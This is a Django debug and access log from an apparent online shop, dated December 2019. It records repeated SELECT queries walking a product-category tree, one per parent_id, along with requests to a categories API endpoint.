DEBUG 2019-12-20 07:13:50,051 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:13:50] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 07:13:58,034 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:13:58,046 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:13:58,053 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:13:58,057 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:13:58,063 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:13:58,067 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:13:58,071 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:13:58,075 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:13:58,080 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:13:58,086 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:13:58,091 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:13:58,095 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:13:58,099 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:13:58,105 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:13:58,111 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:13:58,116 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:13:58,120 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:13:58,124 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:13:58,128 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:13:58,135 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:13:58,139 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:13:58,143 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:13:58,148 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:13:58,152 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:13:58,158 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:13:58,165 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:13:58,169 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:13:58,173 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:13:58,177 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:13:58,182 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:13:58,188 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:13:58,192 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:13:58,196 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:13:58,200 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:13:58,205 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:13:58,210 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:13:58,212 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:13:58,214 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:13:58,216 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:13:58,218 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:13:58,221 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:13:58,223 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:13:58,226 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:13:58,228 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:13:58,231 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:13:58,233 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:13:58] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 07:15:08] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 07:16:54,253 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:16:54,259 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:16:54,263 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:16:54,265 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:16:54,268 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:16:54,270 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:16:54,273 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:16:54,275 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:16:54,277 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:16:54,280 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:16:54,282 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:16:54,284 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:16:54,287 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:16:54,289 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:16:54,292 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:16:54,294 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:16:54,296 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:16:54,298 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:16:54,301 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:16:54,304 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:16:54,306 utils 4252 140031503103744 (0.000) SELECT 